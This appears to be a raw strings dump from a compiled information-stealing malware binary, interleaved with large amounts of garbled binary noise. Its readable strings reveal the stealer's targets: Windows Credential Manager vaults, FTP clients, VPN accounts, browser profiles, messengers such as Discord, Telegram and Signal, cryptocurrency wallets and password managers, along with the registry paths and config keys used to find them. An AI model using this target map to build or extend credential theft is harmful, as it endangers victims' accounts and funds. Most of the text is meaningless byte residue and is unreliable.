9 '468&
6!(12
R6!(12
>330'2
R&gP%7
kQn0DF
awZ6KL
dl_PDi
2>&$3p
dhnqt7
X ER97<,29
~?i1hB/
uAXMIy
fRINFG
hrCV2a
tuGYpT
nj3cSB
puR6ML
System
Credman.txt
[Credman] {0}
Networks.txt
[Networks] {0}
Screenshot.png
[Screenshot] {0}
[Steam] {0}
[Twitch] {0}
[OBS] {0}
FileZilla
Servers.txt
[FileZilla] {0}
WinSCP
[WinSCP] {0}
CoreFTP
[CoreFTP] {0}
Snowflake
[Snowflake] {0}
NordVPN
Account.txt
[NordVPN] {0}
EarthVPN
[EarthVPN] {0}
WindscribeVPN
[WindscribeVPN] {0}
AzireVPN
[AzireVPN] {0}
Browsers
key.dat
Wallets
{0}_{1}_{2}
[Chrome Extensions] {0}
[Telegram] {0}
Messengers
Discord
[Discord] {0}
Pidgin
Accounts.txt
[Pidgin] {0}
Outlook
[OulLook] {0}
FoxMail
[FoxMail] {0}
[Viber] {0}
[WhatsApp] {0}
[Signal] {0}
[RamBox] {0}
[Binance] {0}
[MoneroCore] {0}
[BitcoinCore] {0}
[DashcoinCore] {0}
[DogecoinCore] {0}
[LitecoinCore] {0}
[Electrum] {0}
[Exodus] {0}
[Atomic] {0}
[TonWallet] {0}
[Jaxx] {0}
[Coinomi] {0}
[Daedalus] {0}
[Zcash] {0}
[Guarda] {0}
[Wasabi] {0}
[BitWarden] {0}
[KeePass] {0}
[NordPass] {0}
[1Password] {0}
[RoboForm] {0}
[Grabber] {0} - {0}
[{0}] Thread finished!
r4K0bC
=4 $! #$3
6#? 49;
:i+!w%]n&?w5
"2./8!
t31myt
nN1d1A
*;)>':
aidobQ
kahcaf
lCFPyK
Accounts
Account.rec0
Account
POP3Account
Password
POP3Password
&l ;o$%JQWJ
@?l@YBm1HP
AYCnaLX
33MWAd4;?%
$4/*4@^Ol4=+;
/HsFu/
@H@I E
KNFNG OF
M;OFODOKN
$3#79)%
+:"$'$<*
W1!78?$-:
W-();(>
"9)$)%=>
3%?("9)
JX(W6WyUGWzR
+YKUq>?1 .&;?>'+
.- 3>4
.P|XE<
IMAP Password
POP3 Password
HTTP Password
SMTP Password
SMTP Server
Nothing
W-#g>%4=
W0;}0&-'
_w+2>f@*5{*0/d@8(|5A+s,8Y|552f
sD32Kl
Network
yT0DKG
)r(q0c
[ERROR] Unable to enumerate vaults. Error (0x
2F1A6504-0641-44CF-8BB5-3612D865F2E5
Windows Secure Note
3CCD5499-87A8-4B10-A215-608888DD3B55
Windows Web Password Credential
154E23D0-C644-4E6F-8CE6-5069272F999F
Windows Credential Picker Protector
4BF4C442-9B8A-41A0-B380-DD4A704DDB28
Web Credentials
77BC582B-F0A6-4E15-4E80-61736B6F3B29
Windows Credentials
E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
Windows Domain Certificate Credential
3E0E35BE-1B77-43E7-B873-AED901B6275B
Windows Domain Password Credential
3C886FF3-2669-4AA2-A8FB-3F6759A77548
Windows Extended Credential
00000000-0000-0000-0000-000000000000
Unable to open the following vault:
. Error: 0x
[ERROR] Unable to enumerate vault items from the following vault:
. Error 0x
SchemaId
pResourceElement
pIdentityElement
LastModified
pPackageSid
Error occured while retrieving vault item. Error: 0x
pAuthenticatorElement
snowflake-ssh
session-store.json
folder
{0}:{1}
password
folders
Software\FTPWare\CoreFTP\Sites
hdfzpysvpzimorhk
recentservers.xml
sitemanager.xml
Server
encoding="base64"
uz6D7S
kKjlhL
Software\Martin Prikryl\WinSCP 2\Sessions
HostName
UserName
1.77*"
E0>)"!."
3-'uy%
etTysA
lK3Z_O
y9j6NP
22,:5/
jWIMUI
>=$$'"
'$$ ;%$
eqtLpM
u`&."ho
uCcwxU
3'-?*4?
xtZdvF
<5J/#+
kAzduo
.oe35te
./>@.+6";5T
eAhMC4
)s"(U+7b >q7-
nsE38E
k2CS8y
<6($fA
hblgGx
yoO883
oKBF22
qSSlSd
,'0Xc 4*5-
zdvt5g
9j'b>w
k9lfYV
yeoLtS
q8fMq_
cgNmIs
!21[!69=6(_
Windscribe
Software\Windscribe
userId
authHash
Software\EarthVPN
SavePass
Username
user.config
//setting[@name='Username']/value
//setting[@name='Password']/value
""<>354 ?%!""%8
*+4 4;4
#v6=y)"C
eEUep9
;5w>6=
gMxG1j
# <?CG6%.5
go#"&,
utb_55
-!u1%H7-S
=:'%*(7>
">%!4:!
1>31"?!
;YV=Wd
dhgbfU
'09/545
60#?'35
85pp=1r6#/X
:%1&48,
2=&/:"5
nxhKd6
3?a-9{0;s
qvPSIt
yEICr8
0?+%$<+>52$0#/
lZKDCF
/?#"5,
ckewEK
?'-::4?&-
thlXb_
0|"V+|;g0a*e$
Bu)}%r(
`%e>j<t)uNu<`+d%UNn*c?t;z
!dRg!q-G
A:k7SjU
hA^jUp 5+jU:kBI5
huFeZ6
7.a4/{
7u k'i^
accounts.xml
Pidgin / {0}
>4b$Z'.
/$}3 }/'}
7+&z[ *0!e,
fyp7jj
iuK_a3
t2kmzV
3?o.7.
kgIzh8
kPhryM
rvZOrp
4<5!$"
U:00'
l1V_Tt
9483.48
24?->*2;5,3N
$!<!5!
fACScW
#+9)'2'08%=
qKXG_X
cmXDxw
)%9(<:&
!'"5&:
Profiles
key?.db
<)Br%&=
=+<yK:(&~(#
btFRSw
s7Biec
&+!5%>
03#%><
tKwKIf
e7zdjU
'w&i"d
n4d0i%x"E4h0d
dmpIxz
l$,-c%?,
zexjNx
2-5318
rsv5XF
sbOTnD
zTRKwT
)'9<.!
d1z_zI
/8#`8-<
tvfOyB
kmwDlw
&%a-3f
>l3&z7
&pt0x~
+,f02#.+s(41
dn5Foa
&!0"#>
vWTfNB
*User Data*
Local State
profile
info_cache
Default
stwMVv
>d&/p=<g9 a)
i5eX_D
vPYfyS
kNLLne
wPAAtG
hvLqCv
f9DejF
<&$ =*0
sp_Azv
<8)3-?;
sSdcth
gGFfuj
jXtSgC
sr5l5k
$";/-/ /-#8-:! :8% !/ #,&"8!/
o5pYXc
-?t;*h$8|&*
9&h 'm; j"=~%?h,+i98
/w0|#v>t/y3q(x?j+c(t/`1v.a+
eKVbs5
7}>}0p;c0z<}5|>|?|5}"v0a4}6{?{9
#, 7{/(
74( #"
Q'7"86&"
Q12%52
6)z&*/t((,v*6+|*("}#?#y+<)~$4)t(
lITgki
f71ASY
gPapuM
3'9) *$9"
1'%, %>/
bZwKNL
"><$&==3>&":=0(3*2>?$=*%%;(<)1>9
eohPQp
ssbpLa
>4{>?a#8
=4c" w!>{=7b$ t& z#;{?6
"21815
< 5s" =
p7jSuX
tHhCHe
iR0uqG
0&s&?<a
?,>)+,+,3'7/+3*)6)=5='7),(>14-4'
vwKWsD
:u7D3d
tzPzar
,~&y-}%~2u%y,y+`+u%`(y&|*}/x0~.z
83;:!8 8$0/&%>.1-%.%&9-&!89:%3&:
<U<b->
hLUqp5
yadE5d
+j:u#_Wq+u
?9); 3,6 0# #$)<%>6:&'+"'< :?% 5
8*'*!4,,$5,. -!!,)!*&48#"7'# #&#
=:=w")
kt3Lnf
eSfphY
zSqvuK
!>8~'+30|) ;5t&)95q%2?<g)%8<t#%2
74?;)(:3>)0<6136><3(0:16?11>51)0
iNG1tQ
*+/)6)+1-( 2/+->5545(((=41(<(3*1
&r5>rNRd+%R
s4xs06
$"""=,(##9%&( %&./+,%%$%+,= +/ 9
Local Extension Settings
U:$-:$.H8#91+H,*:%[,$-#$>/1[/6593./1[,
t7QGBn
Z(.>92&75+1$7R*3'%>>;"'R %861<3#
%5< t?1!
xfjscG
nKGczP
D~/+ e2'/aB+%dB:"k>W!a/%>~
+|-Na_O
tsbwy8
qOcxtq
11 $2o'.
(58CNaM'
YgkusDpih
33jy=+=
h,< ty5)RbhA%$|h3="xFA
9gc>6?Co
Ukgq z5
fXSRg2
ajpWDV
5:1vkQ
ciIE9i
4m0g5!
g5gtR2
ibCaCA
:("+ !!2L.
"o&w']
Cv=AVw'j0
$o"}5~!v5WVl3
)5=;!"
Z^8?>U=:<8a!%!9
a)+ :;2
rEqlij
tIN`?(/s.
No.-<`?0
9i9lc0NR{f#Mx
v6nfIf
\?bv'>
S [Y%4
*9.F 6.Wfi
MM4(7+
+!-!A~
=7m~}<7}
vcjE2S
P&H$Sy
mOHLCs
l4MhPP
nydMzu
qKCFtf
0#"/+0
\6<M&A
I_EL:+
@;:.kJ$
SGL:\^
91u=9f5&P
8~-'t#h:"
+3<065G"41B'.^,1+(.,
czgcfp
5))b>*>b14H
:+)1"27F*1 F%/V) /*/$
<%!*-R<!:R?7;6H+$&:7>$=5H+>!<5-$!6H>)$< -
hIVYMn
pzUEdh
ewRO9r